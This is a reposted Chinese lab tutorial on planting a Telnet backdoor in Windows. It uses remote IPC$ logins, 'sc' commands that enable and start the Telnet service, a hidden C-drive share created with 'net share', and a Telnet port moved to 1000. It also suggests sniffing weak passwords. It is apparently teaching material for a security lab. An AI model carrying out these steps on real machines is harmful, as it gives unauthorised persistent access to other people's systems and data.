ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

系统后门种植实验-TELNET

2021-10-22 21:33:43  阅读:124  来源: 互联网

标签:后门 10.1 种植 主机 cmd telnet TELNET net 1.119


1 本地开启Telnet服务

进入主机A,右键“我的电脑”->管理->服务和应用程序->服务,找到Telnet服务,将启动类型改为“手动”

2 远程开启Telnet服务

(1)首先用流光嗅探等工具探得到对方密码,主要是弱口令(此步可跳过,用已知的实验机用户名密码进行试验)。
(2)在主机B的“控制面板-工具-文件夹选项-查看-简单的文件共享”去掉选取。

 

 

 

(3)右键“我的电脑”->管理->服务和应用程序->服务,找到Telnet服务,关闭之

(4)回到主机A用net use命令建立ipc$连接

cmd中输入:net use \10.1.1.119\ipc$ "主机B的密码" /uuser:administrator

(5)用sc命令把禁用的telnet服务变成自动

cmd中输入:sc \10.1.1.119 config tlntsvr start= auto

(6)切换到主机B,可以查看telnet的启动类型已经变为自动,,但还没有启动

(7)回到主机A,用sc命令将telnet启动

cmd中输入:sc \10.1.1.119 start tlntsvr

切换到主机B上就可以看到telnet服务已经启动

(8)新建一个cmd环境进行telnet登录:telnet 10.1.1.119

telnet连接建立之后,可输入用户名密码等相关信息进行登录,telnet服务登录到远程主机:

(9)登录后便可进行共享等相关操作,net share建立c$共享

cmd中输入:net share abc$=c: 

查看共享目录:net share

(10)远程更改telnet端口

输入tlntadmn \10.1.1.119 config port=1000 -u administrator -p 主机B的密码

再次进行telnet连接,则会使用端口1000。

标签:后门,10.1,种植,主机,cmd,telnet,TELNET,net,1.119
来源: https://www.cnblogs.com/wzhtx/p/15440681.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有